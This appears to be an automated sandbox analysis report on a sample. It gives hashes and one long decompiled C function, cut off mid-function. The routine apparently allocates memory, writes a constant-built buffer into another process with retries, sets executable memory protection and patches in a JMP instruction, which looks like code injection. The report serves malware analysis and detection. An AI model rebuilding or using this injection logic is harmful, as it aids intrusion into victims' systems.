API String ID: 10892065-0
Opcode ID: b0b9827a408a293a725a977090a2eec8a9c26ed5fbf0fc385282402cd8318370
Instruction ID: 875b8f9092a38837620798c8e0816c02b88b8b9b4fabba526d88486fc8a24504
Opcode Fuzzy Hash: b0b9827a408a293a725a977090a2eec8a9c26ed5fbf0fc385282402cd8318370
Instruction Fuzzy Hash: 14F08238044B45FFE6508EE16E05AF935D8EB1129CF488925F945B81C4FB205656931A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E9FB254, Relevance: 2.5, Strings: 1, Instructions: 1249
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E6E9FB254(void* __ebx) {
				void* _t428;
				signed int _t433;
				signed int _t508;
				signed int _t529;
				signed int _t531;
				signed int _t539;
				void* _t542;
				signed int _t543;
				signed int _t554;
				signed int _t556;
				void* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t573;
				signed int _t574;
				signed int _t576;
				intOrPtr _t626;
				intOrPtr _t661;
				signed int _t672;
				signed int _t735;
				signed char* _t766;
				signed int _t767;
				void* _t769;
				signed int _t772;
				signed int _t777;
				signed int _t778;
				void* _t780;
				signed int _t782;
				signed int _t783;
				void* _t785;
				signed int _t786;
				signed int _t787;
				void* _t789;
				signed int _t797;
				void* _t827;
				signed int _t999;
				void* _t1101;
				signed int _t1104;
				signed int _t1107;
				signed int _t1109;
				signed int _t1111;
				signed int _t1112;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1143;
				signed int _t1144;
				signed int _t1145;
				intOrPtr _t1148;
				signed int _t1159;
				signed int _t1163;
				intOrPtr _t1178;
				signed int _t1179;
				signed int _t1180;
				intOrPtr _t1181;
				intOrPtr _t1183;
				signed int _t1184;
				signed int _t1186;
				signed int _t1188;
				void* _t1208;
				void* _t1229;
				void* _t1230;
				void* _t1233;
				void* _t1273;

				E6EA19B10(_t1229 + 0x174);
				E6EA10B10(__ebx);
				E6EA19670(_t1229 + 0x184, E6EA19A90(_t1229 + 0x170, _t1175));
				_t428 = E6EA19640(_t1229 + 0x174, 0);
				E6E9FAC20(_t1208, _t428, E6EA19640(_t1229 + 0x184, 0),  *((intOrPtr*)(_t1229 + 0x19c)));
				_t1230 = _t1229 + 8;
				_t772 = E6EA19650(_t1230 + 0x180);
				_t8 = _t772 + 2; // 0x2
				 *(_t1230 + 0x224) = E6E9FD860(_t1230 + 0x1ac, 0x20000000, _t1273, _t8);
				 *(_t1230 + 0x58) = 0x20000000;
				_t433 = E6E9FDB60(_t1230 + 0x1ac, 0x80000000, _t1273, 0x82);
				 *(_t1230 + 0x21c) = _t433;
				 *(_t1230 + 0x220) = 0x80000000;
				if((_t433 |  *(_t1230 + 0x220)) == 0 || ( *(_t1230 + 0x224) |  *(_t1230 + 0x58)) == 0) {
					L6EA19510(_t1230 + 0x180);
					L6EA19510(_t1230 + 0x170);
					L6EA19510(_t1230 + 0x160);
					L6EA19510(_t1230 + 0x228);
					E6E9FE2F0(_t772, _t1230 + 0x1bc, _t1208);
					L6EA19510(_t1230 + 0x1ac);
					return 0;
				} else {
					E6EA00B70(_t1230 + 0x70, 0, 0x80);
					_t1233 = _t1230 + 0xc;
					 *((intOrPtr*)(_t1233 + 0xd0)) =  *((intOrPtr*)(_t1208 + 8));
					_push(0);
					_push(0);
					E6EA22060(_t772, _t1233 + 0x110, 0, _t1175);
					 *((intOrPtr*)(_t1233 + 0x14c)) =  *((intOrPtr*)(_t1233 + 0x48));
					_t1101 = _t1233 + 0x110;
					 *((intOrPtr*)(_t1101 + 0x38)) =  *((intOrPtr*)(_t1208 + 0xc));
					_push(_t1101);
					E6E9FE090(_t1233 + 0x134, _t1175, _t1233 + 0x148);
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0xb0], xmm1");
					 *((intOrPtr*)(_t1233 + 0xb8)) = E6EA19650( *((intOrPtr*)(_t1208 + 0xc)));
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [esp+0xc0], xmm1");
					 *((intOrPtr*)(_t1233 + 0xc8)) = E6EA19650( *((intOrPtr*)(_t1233 + 0x48)));
					asm("cdq");
					asm("movd xmm1, eax");
					asm("movd xmm0, edx");
					asm("punpckldq xmm1, xmm0");
					asm("movq [edi-0xb8], xmm1");
					E6EA20FA0(_t1175, _t1233 + 0xf8, __eflags,  *((intOrPtr*)(_t1233 + 0x1b0)),  *((intOrPtr*)(_t1233 + 0x220)), 7, _t1233 + 0x190);
					_t827 = _t1233 + 0x228;
					 *((intOrPtr*)(_t827 - 0x148)) =  *((intOrPtr*)(_t1233 + 0x1a4));
					 *((intOrPtr*)(_t827 - 0x144)) =  *((intOrPtr*)(_t827 - 0x10));
					L6EA1A110(_t827);
					 *((intOrPtr*)(_t1233 + 0x60)) = 0x9cac62c7;
					asm("pxor xmm0, xmm0");
					asm("movq [esp+0x68], xmm0");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0xa8f2638d;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0xd8cc7390;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0x6a68465a;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0x58d59bc9;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0xe9fbf3a8;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0x649746ec;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					asm("pxor xmm1, xmm1");
					asm("movups [eax], xmm0");
					 *((intOrPtr*)(_t1233 + 0x60)) = 0x35b39b2b;
					asm("movq [esp+0x68], xmm1");
					E6EA19670(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0x10);
					E6EA19640(_t1233 + 0x22c, E6EA19650(_t1233 + 0x228) + 0xfffffff0);
					asm("movups xmm0, [esp+0x60]");
					_t1104 = _t1233 + 0x228;
					asm("movups [eax], xmm0");
					E6EA21270(0x588ab3ea, _t1104);
					E6EA19640(_t1233 + 0x22c, 0);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x70], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x10);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x78], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x80], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x88], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x90], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x98], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0xa0], xmm0");
					E6EA19640(_t1233 + 0x22c, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx-0x100], xmm0");
					_t508 = L6E9FD530(_t1233 + 0x1a8, _t1104);
					 *(_t1233 + 0x198) = _t508;
					 *(_t1233 + 0x194) = _t1104;
					_t1141 = _t1104 - 0xffffffff;
					__eflags = _t508 - 0xffffffff | _t1104 - 0xffffffff;
					if((_t508 - 0xffffffff | _t1104 - 0xffffffff) == 0) {
						E6E9FE230(_t1233 + 0x128);
						L6EA22530(_t772, _t1233 + 0x110, 0xffffffff, _t1141, _t1175);
						L6EA19510(_t1233 + 0x180);
						L6EA19510(_t1233 + 0x170);
						L6EA19510(_t1233 + 0x160);
						L6EA19510(_t1233 + 0x228);
						E6E9FE2F0(_t772, _t1233 + 0x1bc, _t1208);
						L6EA19510(_t1233 + 0x1ac);
						__eflags = 0;
						return 0;
					} else {
						_t1107 =  *(_t1233 + 0x240) |  *(_t1233 + 0x244);
						__eflags = _t1107;
						if(_t1107 == 0) {
							 *(_t1233 + 0x50) = _t772;
							_t1143 = 0;
							__eflags = 0;
							 *((intOrPtr*)(_t1233 + 0x54)) = _t1175;
							do {
								_push(0);
								E6EA19350(_t1233 + 0x104);
								E6EA016B0(_t1143, _t1175, _t1233 + 0x13c, 0x57325ee3);
								E6EA0FDB0(_t1233 + 0x13c, _t1233 + 0x140);
								_t1108 = 0x7fffffff;
								E6EA19710(_t1233 + 0x108,  *((intOrPtr*)(_t1233 + 0x140)), E6EA16040( *((intOrPtr*)(_t1233 + 0x140)), 0x7fffffff));
								E6EA10B10(_t1233 + 0x140);
								E6EA08CA0(_t1233 + 0x138);
								_t1178 =  *((intOrPtr*)(_t1233 + 0x21c));
								_t776 =  *((intOrPtr*)(_t1233 + 0x220));
								_t529 = E6EA19650(_t1233 + 0x100);
								__eflags = _t529;
								if(_t529 <= 0) {
									L21:
									asm("movq xmm0, [esp+0x200]");
									asm("movq [esp], xmm0");
									asm("pxor xmm2, xmm2");
									 *((intOrPtr*)(_t1233 + 8)) = 5;
									 *(_t1233 + 0xc) =  *(_t1233 + 0x198);
									asm("movq xmm1, [esp+0x210]");
									 *(_t1233 + 0x10) =  *(_t1233 + 0x194);
									asm("movq [esp+0x14], xmm1");
									_t776 =  *((intOrPtr*)(_t1233 + 0x21c));
									 *((intOrPtr*)(_t1233 + 0x1c)) =  *((intOrPtr*)(_t1233 + 0x21c));
									_t1175 =  *((intOrPtr*)(_t1233 + 0x220));
									 *((intOrPtr*)(_t1233 + 0x20)) =  *((intOrPtr*)(_t1233 + 0x220));
									asm("movq [esp+0x24], xmm2");
									asm("movq [esp+0x2c], xmm2");
									_t531 = E6EA204B0(_t1143);
									__eflags = _t531;
									if(_t531 == 0) {
										E6EA022A0(0x3e8, _t1108);
										L6EA19510(_t1233 + 0x100);
										_t1107 = _t1233 + 0x23c;
										L6E9FD570(_t1233 + 0x1ac, _t1107, _t1233 + 0x240);
										__eflags =  *(_t1233 + 0x240) |  *(_t1233 + 0x244);
										if(( *(_t1233 + 0x240) |  *(_t1233 + 0x244)) != 0) {
											_t772 =  *(_t1233 + 0x50);
											_t1175 =  *((intOrPtr*)(_t1233 + 0x54));
											goto L5;
										} else {
											_t735 = L6E9FD530(_t1233 + 0x1a8, _t1107);
											 *(_t1233 + 0x198) = _t735;
											 *(_t1233 + 0x194) = _t1107;
											_t1131 = _t1107 - 0xffffffff;
											__eflags = _t735 - 0xffffffff | _t1107 - 0xffffffff;
											if((_t735 - 0xffffffff | _t1107 - 0xffffffff) == 0) {
												E6E9FE230(_t1233 + 0x128);
												L6EA22530(_t776, _t1233 + 0x110, _t1131, _t1143, _t1175);
												L6EA19510(_t1233 + 0x180);
												L6EA19510(_t1233 + 0x170);
												L6EA19510(_t1233 + 0x160);
												L6EA19510(_t1233 + 0x228);
												E6E9FE2F0(_t776, _t1233 + 0x1bc, _t1208);
												L6EA19510(_t1233 + 0x1ac);
												__eflags = 0;
												return 0;
											} else {
												goto L25;
											}
										}
									} else {
										goto L22;
									}
								} else {
									__eflags = 0;
									 *((intOrPtr*)(_t1233 + 0x40)) = _t1143;
									_t1143 = _t1178;
									_t1175 = 0;
									while(1) {
										_t766 = E6EA19640(_t1233 + 0x104, _t1175);
										asm("movq xmm0, [esp+0x200]");
										asm("movq [esp], xmm0");
										 *((intOrPtr*)(_t1233 + 8)) = 5;
										 *(_t1233 + 0xc) =  *(_t1233 + 0x198);
										asm("movq xmm1, [esp+0x1f8]");
										 *(_t1233 + 0x10) =  *(_t1233 + 0x194);
										_t1108 =  *_t766 & 0x000000ff;
										asm("movq [esp+0x14], xmm1");
										asm("movq xmm2, [0x6ea29d40]");
										 *((intOrPtr*)(_t1233 + 0x1c)) = _t1143;
										 *((intOrPtr*)(_t1233 + 0x20)) = _t776;
										 *(_t1233 + 0x24) =  *_t766 & 0x000000ff;
										 *((intOrPtr*)(_t1233 + 0x28)) = 0;
										asm("movq [esp+0x2c], xmm2");
										_t767 = E6EA204B0(_t1143);
										__eflags = _t767;
										if(_t767 != 0) {
											break;
										}
										E6EA022A0(0x64, _t1108);
										_t1143 = _t1143 + 1;
										asm("adc ebx, 0x0");
										_t1175 = _t1175 + 1;
										_t769 = E6EA19650(_t1233 + 0x100);
										__eflags = _t1175 - _t769;
										if(_t1175 < _t769) {
											continue;
										} else {
											_t1143 =  *((intOrPtr*)(_t1233 + 0x40));
											goto L21;
										}
										goto L82;
									}
									L22:
									L6EA19510(_t1233 + 0x100);
									E6E9FE230(_t1233 + 0x128);
									L6EA22530(_t776, _t1233 + 0x110, _t1108, _t1143, _t1175);
									L6EA19510(_t1233 + 0x180);
									L6EA19510(_t1233 + 0x170);
									L6EA19510(_t1233 + 0x160);
									L6EA19510(_t1233 + 0x228);
									E6E9FE2F0(_t776, _t1233 + 0x1bc, _t1208);
									L6EA19510(_t1233 + 0x1ac);
									__eflags = 0;
									return 0;
								}
								goto L82;
								L25:
								_t1143 = _t1143 + 1;
								__eflags = _t1143 - 0xa;
							} while (_t1143 != 0xa);
							E6E9FE230(_t1233 + 0x128);
							L6EA22530(_t776, _t1233 + 0x110, _t1131, _t1143, _t1175);
							L6EA19510(_t1233 + 0x180);
							L6EA19510(_t1233 + 0x170);
							L6EA19510(_t1233 + 0x160);
							L6EA19510(_t1233 + 0x228);
							E6E9FE2F0(_t776, _t1233 + 0x1bc, _t1208);
							L6EA19510(_t1233 + 0x1ac);
							__eflags = 0;
							return 0;
						} else {
							L5:
							 *(_t1233 + 0x50) = _t772;
							_t1144 = 0;
							__eflags = 0;
							 *((intOrPtr*)(_t1233 + 0x54)) = _t1175;
							_t1179 =  *(_t1233 + 0x194);
							_t777 =  *(_t1233 + 0x198);
							while(1) {
								asm("movq xmm0, [esp+0x200]");
								asm("movq xmm1, [esp+0x1f8]");
								asm("pxor xmm2, xmm2");
								asm("movq [esp], xmm0");
								 *((intOrPtr*)(_t1233 + 8)) = 5;
								 *(_t1233 + 0xc) = _t777;
								 *(_t1233 + 0x10) = _t1179;
								asm("movq [esp+0x14], xmm1");
								 *((intOrPtr*)(_t1233 + 0x1c)) =  *((intOrPtr*)(_t1233 + 0x21c));
								asm("movq xmm3, [0x6ea29d48]");
								 *((intOrPtr*)(_t1233 + 0x20)) =  *((intOrPtr*)(_t1233 + 0x220));
								asm("movq [esp+0x24], xmm2");
								asm("movq [esp+0x2c], xmm3");
								_t539 = E6EA204B0(_t1144);
								__eflags = _t539;
								if(_t539 == 0) {
									break;
								}
								_t777 = L6E9FD530(_t1233 + 0x1a8, _t1107);
								_t1179 = _t1107;
								_t1107 = _t1179 - 0xffffffff;
								__eflags = _t777 - 0xffffffff | _t1107;
								if((_t777 - 0xffffffff | _t1107) == 0) {
									E6E9FE230(_t1233 + 0x128);
									L6EA22530(_t777, _t1233 + 0x110, _t1107, _t1144, _t1179);
									L6EA19510(_t1233 + 0x180);
									L6EA19510(_t1233 + 0x170);
									L6EA19510(_t1233 + 0x160);
									L6EA19510(_t1233 + 0x228);
									E6E9FE2F0(_t777, _t1233 + 0x1bc, _t1208);
									L6EA19510(_t1233 + 0x1ac);
									__eflags = 0;
									return 0;
								} else {
									_t1144 = _t1144 + 1;
									__eflags = _t1144 - 0xa;
									if(_t1144 != 0xa) {
										continue;
									} else {
										E6E9FE230(_t1233 + 0x128);
										L6EA22530(_t777, _t1233 + 0x110, _t1107, _t1144, _t1179);
										L6EA19510(_t1233 + 0x180);
										L6EA19510(_t1233 + 0x170);
										L6EA19510(_t1233 + 0x160);
										L6EA19510(_t1233 + 0x228);
										E6E9FE2F0(_t777, _t1233 + 0x1bc, _t1208);
										L6EA19510(_t1233 + 0x1ac);
										__eflags = 0;
										return 0;
									}
								}
								goto L82;
							}
							 *(_t1233 + 0x194) = _t1179;
							_t1145 = 0;
							__eflags = 0;
							 *(_t1233 + 0x198) = _t777;
							_t1180 =  *(_t1233 + 0x194);
							_t778 =  *(_t1233 + 0x198);
							while(1) {
								_push(0x80);
								_push( *((intOrPtr*)(_t1233 + 0x224)));
								_push( *((intOrPtr*)(_t1233 + 0x224)));
								_push(_t1180);
								_push(_t778);
								_t1109 = _t1233 + 0x84;
								__eflags = L6E9FD170(_t1233 + 0x1bc, _t1109);
								if(__eflags != 0) {
									break;
								}
								_t778 = L6E9FD530(_t1233 + 0x1a8, _t1109);
								_t1180 = _t1109;
								_t1129 = _t1180 - 0xffffffff;
								__eflags = _t778 - 0xffffffff | _t1180 - 0xffffffff;
								if((_t778 - 0xffffffff | _t1180 - 0xffffffff) == 0) {
									E6E9FE230(_t1233 + 0x128);
									L6EA22530(_t778, _t1233 + 0x110, _t1129, _t1145, _t1180);
									L6EA19510(_t1233 + 0x180);
									L6EA19510(_t1233 + 0x170);
									L6EA19510(_t1233 + 0x160);
									L6EA19510(_t1233 + 0x228);
									E6E9FE2F0(_t778, _t1233 + 0x1bc, _t1208);
									L6EA19510(_t1233 + 0x1ac);
									__eflags = 0;
									return 0;
								} else {
									_t1145 = _t1145 + 1;
									__eflags = _t1145 - 0xa;
									if(_t1145 != 0xa) {
										continue;
									} else {
										E6E9FE230(_t1233 + 0x128);
										L6EA22530(_t778, _t1233 + 0x110, _t1129, _t1145, _t1180);
										L6EA19510(_t1233 + 0x180);
										L6EA19510(_t1233 + 0x170);
										L6EA19510(_t1233 + 0x160);
										L6EA19510(_t1233 + 0x228);
										E6E9FE2F0(_t778, _t1233 + 0x1bc, _t1208);
										L6EA19510(_t1233 + 0x1ac);
										__eflags = 0;
										return 0;
									}
								}
								goto L82;
							}
							 *(_t1233 + 0x198) = _t778;
							 *((intOrPtr*)(_t1233 + 0x64)) =  *((intOrPtr*)(_t1233 + 0x58));
							asm("cdq");
							asm("movd xmm1, ebx");
							_t780 = _t1233 + 0x5c;
							_t1146 =  *((intOrPtr*)(_t780 + 0x1c8));
							_t542 = _t1233 + 0x68;
							 *(_t542 + 0x12c) = _t1180;
							asm("movd xmm0, edx");
							asm("punpckldq xmm1, xmm0");
							_t1181 =  *((intOrPtr*)(_t542 - 0x14));
							 *((intOrPtr*)(_t542 - 0xc)) = 0;
							 *((intOrPtr*)(_t542 - 8)) =  *((intOrPtr*)(_t780 + 0x1c8));
							asm("movdqu [eax-0x28], xmm1");
							asm("movq [eax], xmm1");
							_t1111 = _t1233 + 0x6c;
							_t543 = E6EA20C90(_t1181, _t1111, __eflags, _t542, 0x40, _t780);
							__eflags = _t543;
							if(_t543 != 0) {
								E6E9FE230(_t1233 + 0x128);
								L6EA22530(_t780, _t1233 + 0x110, _t1111, _t1146, _t1181);
								L6EA19510(_t1233 + 0x180);
								L6EA19510(_t1233 + 0x170);
								L6EA19510(_t1233 + 0x160);
								L6EA19510(_t1233 + 0x228);
								E6E9FE2F0(_t780, _t1233 + 0x1bc, _t1208);
								L6EA19510(_t1233 + 0x1ac);
								__eflags = 0;
								return 0;
							} else {
								__eflags = 0;
								 *((intOrPtr*)(_t1233 + 0x54)) = _t1181;
								 *(_t1233 + 0x50) = 0;
								_t782 =  *(_t1233 + 0x198);
								_t1148 =  *((intOrPtr*)(_t1233 + 0x58));
								_t1183 =  *((intOrPtr*)(_t1233 + 0x224));
								while(1) {
									L31:
									asm("movq xmm0, [esp+0x200]");
									asm("movq [esp], xmm0");
									asm("pxor xmm2, xmm2");
									 *((intOrPtr*)(_t1233 + 8)) = 5;
									 *(_t1233 + 0xc) = _t782;
									asm("movq xmm1, [esp+0x1f8]");
									 *(_t1233 + 0x10) =  *(_t1233 + 0x194);
									asm("movq [esp+0x14], xmm1");
									 *((intOrPtr*)(_t1233 + 0x1c)) = _t1183;
									 *((intOrPtr*)(_t1233 + 0x20)) = _t1148;
									asm("movq [esp+0x24], xmm2");
									asm("movdqu xmm3, [esp+0x40]");
									asm("movq [esp+0x2c], xmm3");
									_t554 = E6EA204B0(_t1148);
									__eflags = _t554;
									if(_t554 == 0) {
										break;
									}
									_t797 = 0;
									__eflags = 0;
									while(1) {
										_t672 = E6E9FCA10(_t1233 + 0x1a8, __eflags);
										_t999 = _t1111;
										_t1111 = _t672 | _t999;
										__eflags = _t1111;
										if(_t1111 != 0) {
											break;
										}
										__eflags = _t797 - 0x20;
										if(_t797 == 0x20) {
											_t782 = 0xffffffff;
											 *(_t1233 + 0x194) = 0xffffffff;
										} else {
											E6EA022A0(0x5dc, _t1111);
											_t797 = _t797 + 1;
											continue;
										}
										L43:
										__eflags = _t782 - 0xffffffff |  *(_t1233 + 0x194) - 0xffffffff;
										if((_t782 - 0xffffffff |  *(_t1233 + 0x194) - 0xffffffff) == 0) {
											E6E9FE230(_t1233 + 0x128);
											L6EA22530(_t782, _t1233 + 0x110, 0xffffffff, _t1148, _t1183);
											L6EA19510(_t1233 + 0x180);
											L6EA19510(_t1233 + 0x170);
											L6EA19510(_t1233 + 0x160);
											L6EA19510(_t1233 + 0x228);
											E6E9FE2F0(_t782, _t1233 + 0x1bc, _t1208);
											L6EA19510(_t1233 + 0x1ac);
											__eflags = 0;
											return 0;
										} else {
											_t1111 =  *(_t1233 + 0x50) + 1;
											 *(_t1233 + 0x50) = _t1111;
											__eflags = _t1111 - 0xa;
											if(_t1111 != 0xa) {
												goto L31;
											} else {
												E6E9FE230(_t1233 + 0x128);
												L6EA22530(_t782, _t1233 + 0x110, _t1111, _t1148, _t1183);
												L6EA19510(_t1233 + 0x180);
												L6EA19510(_t1233 + 0x170);
												L6EA19510(_t1233 + 0x160);
												L6EA19510(_t1233 + 0x228);
												E6E9FE2F0(_t782, _t1233 + 0x1bc, _t1208);
												L6EA19510(_t1233 + 0x1ac);
												__eflags = 0;
												return 0;
											}
										}
										goto L82;
									}
									 *(_t1233 + 0x194) = _t999;
									_t782 = _t672;
									goto L43;
								}
								 *(_t1233 + 0x198) = _t782;
								__eflags = 0;
								_t783 =  *(_t1233 + 0x194);
								_t1184 =  *(_t1233 + 0x198);
								 *((intOrPtr*)(_t1233 + 0x40)) = 0;
								while(1) {
									_t556 = E6EA19640(_t1233 + 0x184, 0);
									_t1149 = _t556;
									_push(E6EA19650(_t1233 + 0x180));
									_push( *((intOrPtr*)(_t1233 + 0x5c)));
									_push( *((intOrPtr*)(_t1233 + 0x22c)));
									_push(_t783);
									_push(_t1184);
									_t1112 = _t556;
									__eflags = L6E9FD170(_t1233 + 0x1bc, _t1112);
									if(__eflags != 0) {
										break;
									}
									_t1163 = 0;
									__eflags = 0;
									while(1) {
										_t1184 = E6E9FCA10(_t1233 + 0x1a8, __eflags);
										_t783 = _t1112;
										__eflags = _t1184 | _t783;
										if((_t1184 | _t783) != 0) {
											break;
										}
										__eflags = _t1163 - 0x20;
										if(_t1163 == 0x20) {
											_t1184 = 0xffffffff;
											_t783 = 0xffffffff;
										} else {
											E6EA022A0(0x5dc, _t1112);
											_t1163 = _t1163 + 1;
											continue;
										}
										break;
									}
									_t1124 = _t783 - 0xffffffff;
									__eflags = _t1184 - 0xffffffff | _t783 - 0xffffffff;
									if((_t1184 - 0xffffffff | _t783 - 0xffffffff) == 0) {
										E6E9FE230(_t1233 + 0x128);
										L6EA22530(_t783, _t1233 + 0x110, _t1124, _t1163, _t1184);
										L6EA19510(_t1233 + 0x180);
										L6EA19510(_t1233 + 0x170);
										L6EA19510(_t1233 + 0x160);
										L6EA19510(_t1233 + 0x228);
										E6E9FE2F0(_t783, _t1233 + 0x1bc, _t1208);
										L6EA19510(_t1233 + 0x1ac);
										__eflags = 0;
										return 0;
									} else {
										_t661 =  *((intOrPtr*)(_t1233 + 0x40)) + 1;
										 *((intOrPtr*)(_t1233 + 0x40)) = _t661;
										__eflags = _t661 - 0xa;
										if(_t661 != 0xa) {
											continue;
										} else {
											E6E9FE230(_t1233 + 0x128);
											L6EA22530(_t783, _t1233 + 0x110, _t1124, _t1163, _t1184);
											L6EA19510(_t1233 + 0x180);
											L6EA19510(_t1233 + 0x170);
											L6EA19510(_t1233 + 0x160);
											L6EA19510(_t1233 + 0x228);
											E6E9FE2F0(_t783, _t1233 + 0x1bc, _t1208);
											L6EA19510(_t1233 + 0x1ac);
											__eflags = 0;
											return 0;
										}
									}
									goto L82;
								}
								 *(_t1233 + 0x198) = _t1184;
								_t559 = _t1233 + 0x5c;
								 *(_t559 + 0x138) = _t783;
								_t1185 =  *((intOrPtr*)(_t559 - 8));
								_t784 = _t1233 + 0x70;
								_t1113 = _t1233 + 0x6c;
								_t560 = E6EA20C90( *((intOrPtr*)(_t559 - 8)), _t1233 + 0x6c, __eflags, _t1233 + 0x70,  *((intOrPtr*)(_t1233 + 0x60)), _t559);
								__eflags = _t560;
								if(_t560 == 0) {
									_push(0);
									E6EA19350(_t1233 + 0x44);
									 *((char*)(_t1233 + 0x58)) = 0xe9;
									E6EA19710(_t1233 + 0x48, _t1233 + 0x58, 1);
									 *(_t1233 + 0x50) =  *((intOrPtr*)(_t1233 + 0x224)) -  *((intOrPtr*)(_t1233 + 0x1a4)) + 0xfffffffb;
									E6EA19710(_t1233 + 0x48, _t1233 + 0x50, 4);
									_t785 = _t1233 + 0x5c;
									asm("movq xmm0, [0x6ea29d50]");
									 *((intOrPtr*)(_t785 + 4)) =  *((intOrPtr*)(_t1233 + 0x1a4));
									 *((intOrPtr*)(_t785 + 8)) =  *((intOrPtr*)(_t785 + 0x1bc));
									asm("movq [ebx+0xc], xmm0");
									E6EA20C90(_t1185, _t1233 + 0x6c, __eflags, _t1233 + 0x70, 0x40, _t785);
									__eflags = 0;
									 *((intOrPtr*)(_t1233 + 0x54)) = 0;
									_t786 =  *(_t1233 + 0x194);
									_t1186 =  *(_t1233 + 0x198);
									while(1) {
										_t571 = E6EA19640(_t1233 + 0x44, 0);
										_push(E6EA19650(_t1233 + 0x40));
										_push( *((intOrPtr*)(_t1233 + 0x21c)));
										_push( *((intOrPtr*)(_t1233 + 0x1ac)));
										_push(_t786);
										_push(_t1186);
										_t1117 = _t571;
										_t573 = L6E9FD170(_t1233 + 0x1bc, _t1117);
										__eflags = _t573;
										if(_t573 != 0) {
											break;
										}
										_t1159 = 0;
										__eflags = 0;
										while(1) {
											_t1186 = E6E9FCA10(_t1233 + 0x1a8, __eflags);
											_t786 = _t1117;
											__eflags = _t1186 | _t786;
											if((_t1186 | _t786) != 0) {
												break;
											}
											__eflags = _t1159 - 0x20;
											if(_t1159 == 0x20) {
												_t1186 = 0xffffffff;
												_t786 = 0xffffffff;
											} else {
												E6EA022A0(0x5dc, _t1117);
												_t1159 = _t1159 + 1;
												continue;
											}
											break;
										}
										_t1122 = _t786 - 0xffffffff;
										__eflags = _t1186 - 0xffffffff | _t786 - 0xffffffff;
										if((_t1186 - 0xffffffff | _t786 - 0xffffffff) == 0) {
											L6EA19510(_t1233 + 0x40);
											E6E9FE230(_t1233 + 0x128);
											L6EA22530(_t786, _t1233 + 0x110, _t1122, _t1159, _t1186);
											L6EA19510(_t1233 + 0x180);
											L6EA19510(_t1233 + 0x170);
											L6EA19510(_t1233 + 0x160);
											L6EA19510(_t1233 + 0x228);
											E6E9FE2F0(_t786, _t1233 + 0x1bc, _t1208);
											L6EA19510(_t1233 + 0x1ac);
											__eflags = 0;
											return 0;
										} else {
											_t626 =  *((intOrPtr*)(_t1233 + 0x54)) + 1;
											 *((intOrPtr*)(_t1233 + 0x54)) = _t626;
											__eflags = _t626 - 0xa;
											if(_t626 != 0xa) {
												continue;
											} else {
												L6EA19510(_t1233 + 0x40);
												E6E9FE230(_t1233 + 0x128);
												L6EA22530(_t786, _t1233 + 0x110, _t1122, _t1159, _t1186);
												L6EA19510(_t1233 + 0x180);
